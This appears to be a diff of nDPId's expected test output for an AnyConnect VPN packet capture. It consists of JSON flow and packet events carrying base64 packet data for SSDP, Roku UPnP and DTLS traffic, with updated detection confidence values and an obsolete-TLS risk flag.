00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1569687267988,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267988,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0c9UAAEAG69IKAADjSn3FvN4qAbvQnkCVU\/eYD4AREABMcgAAAQEIChwN0hGhDZLg"} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":391,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267991,"flow_last_seen":1569687267991,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687267991,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":61328,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1569687267991,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1569687267991,"pkt":"AQBef\/\/6NDY7z3UoCABFAADKY+gAAAERWl4KAADj7\/\/\/+u+QB2wAtlB4TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS83Ny4wLjM4NjUuOTAgTWFjIE9TIFgNCg0K"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267991,"flow_last_seen":1569687267991,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687267991,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":61328,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267991,"flow_last_seen":1569687267991,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687267991,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":61328,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1569687268026,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687268026,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0lz4AAGoGnmlKfcW8CgAA4wG73ipT95gP0J5AloAQAP3kSQAAAQEICqEOCgscDdIR"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268077,"flow_last_seen":1569687268077,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687268077,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":38616,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1569687268077,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":556,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":556,"pkt_l4_len":522,"thread_ts_msec":1569687268077,"pkt":"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"} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":397,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268077,"flow_last_seen":1569687268077,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687268077,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":38616,"dst_port":61328,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":397,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268077,"flow_last_seen":1569687268077,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687268077,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":38616,"dst_port":61328,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1569687268176,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687268176,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl94iH3wAQcGNmjQa94AREAAg9AAAAQEIChwN0scGksZO"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":411,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268376,"flow_last_seen":1569687268376,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687268376,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1569687268376,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"thread_ts_msec":1569687268376,"pkt":"NDY7z3Uo2DE0IHf7CABFAAFTj5RAAEARlIwKAACXCgAA4wds75ABPzXfSFRUUC8xLjEgMjAwIE9LDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDoyOTVjMDAwNC02ODA3LTEwNmQtODBjZi1kODMxMzQyMDc3ZmI6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KRXh0OiANClNlcnZlcjogUm9rdSBVUG5QLzEuMCBSb2t1LzkuMS4wDQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNTE6ODA2MC9kaWFsL2RkLnhtbA0KV0FLRVVQOiBNQUM9ZDg6MzE6MzQ6MjA6Nzc6ZmI7VGltZW91dD0xMA0KDQo="} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268376,"flow_last_seen":1569687268376,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687268376,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":61328,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268376,"flow_last_seen":1569687268376,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687268376,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":61328,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":412,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268559,"flow_last_seen":1569687268559,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687268559,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":57547,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1569687268559,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1569687268559,"pkt":"AQBef\/\/6NDY7z3UoCABFAADKeUwAAAERRPoKAADj7\/\/\/+uDLB2wAtl89TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS83Ny4wLjM4NjUuOTAgTWFjIE9TIFgNCg0K"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":412,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268559,"flow_last_seen":1569687268559,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687268559,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":57547,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":412,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268559,"flow_last_seen":1569687268559,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687268559,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":57547,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":413,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268746,"flow_last_seen":1569687268746,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1569687268746,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":54107,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":413,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1569687268746,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"thread_ts_msec":1569687268746,"pkt":"LH6BsEqhNDY7z3UoCABFAAB\/CAgAAEAR+QMKAADjCCVmW9NbAbsAa+4DFgEAAAAAAAAAAAAAVgEAAEoAAAAAAAAASgEA7YnEaZ6hZImmhCHr0JUfCBctWVvywlB71JRnxl7mI4ogm7BxyKgEQGFPg0eizi7+AVQMevU74i4erAc5hyngJu8AAAIAOQEA"} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":413,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268746,"flow_last_seen":1569687268746,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1569687268746,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":54107,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":415,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268747,"flow_last_seen":1569687268747,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687268747,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":50081,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1569687268747,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":556,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":556,"pkt_l4_len":522,"thread_ts_msec":1569687268747,"pkt":"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"} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268747,"flow_last_seen":1569687268747,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687268747,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":50081,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268747,"flow_last_seen":1569687268747,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687268747,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":50081,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1569687268789,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1569687268789,"pkt":"NDY7z3UoLH6BsEqhCABFAABMkFUAAPcRuegIJWZbCgAA4wG701sAOF8pFgEAAAAAAAAAAAAAIwMAABcAAAAAAAAAFwEAFGKRvPEadu7FYjYhjKxM1MN8EkEd"} 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1569687268790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":161,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":161,"pkt_l4_len":127,"thread_ts_msec":1569687268790,"pkt":"LH6BsEqhNDY7z3UoCABFAACTQPwAAEARv\/sKAADjCCVmW9NbAbsAf9nwFgEAAAAAAAAAAAEAagEAAF4AAQAAAAAAXgEA7YnEaZ6hZImmhCHr0JUfCBctWVvywlB71JRnxl7mI4ogm7BxyKgEQGFPg0eizi7+AVQMevU74i4erAc5hyngJu8UYpG88Rp27sViNiGMrEzUw3wSQR0AAgA5AQA="} 
-00605{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":503,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1569687268746,"flow_last_seen":1569687268992,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":365,"flow_tot_l4_payload_len":5474,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1569687268992,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":54107,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":465,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687268746,"flow_last_seen":1569687268836,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":454,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1569687268836,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":54107,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":519,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269094,"flow_last_seen":1569687269094,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1569687269094,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.1","src_port":52595,"dst_port":192,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1569687269094,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":46,"pkt_l4_len":12,"thread_ts_msec":1569687269094,"pkt":"LH6BsEqhNDY7z3UoCABFAAAg7WwAAEAReH0KAADjCgAAAc1zAMAADBGuCAEDEA=="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":578,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269223,"flow_last_seen":1569687269223,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687269223,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1569687269223,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"thread_ts_msec":1569687269223,"pkt":"NDY7z3Uo2DE0IHf7CABFAAFTj6FAAEARlH8KAACXCgAA4wds4MsBP0SkSFRUUC8xLjEgMjAwIE9LDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDoyOTVjMDAwNC02ODA3LTEwNmQtODBjZi1kODMxMzQyMDc3ZmI6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KRXh0OiANClNlcnZlcjogUm9rdSBVUG5QLzEuMCBSb2t1LzkuMS4wDQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNTE6ODA2MC9kaWFsL2RkLnhtbA0KV0FLRVVQOiBNQUM9ZDg6MzE6MzQ6MjA6Nzc6ZmI7VGltZW91dD0xMA0KDQo="} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269223,"flow_last_seen":1569687269223,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687269223,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269223,"flow_last_seen":1569687269223,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687269223,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":678,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1569687269559,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1569687269559,"pkt":"AQBef\/\/6NDY7z3UoCABFAADKtRAAAAERCTYKAADj7\/\/\/+uDLB2wAtl89TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS83Ny4wLjM4NjUuOTAgTWFjIE9TIFgNCg0K"} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269561,"flow_last_seen":1569687269561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687269561,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1569687269561,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687269561,"pkt":"pHczjPFANDY7z3UoCABFAABAAABAAEAGJUEKAADjCgAAld56H0gqQcOaAAAAALAC\/\/9B2AAAAgQFtAEDAwUBAQgKHA3YAQAAAAAEAgAA"} 
@@ -284,86 +285,86 @@ 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1569687269562,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687269562,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl957H3yCfYpEAAAAALAC\/\/8iuwAAAgQFtAEDAwUBAQgKHA3YAQAAAAAEAgAA"} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1569687269563,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569687269563,"pkt":"NDY7z3UopHczjPFACABFAAA8AABAAEAGJUUKAACVCgAA4x9I3np8gG11KkHDm6ASOJBP2wAAAgQFtAQCCAoAIeBIHA3YAQEDAwY="} 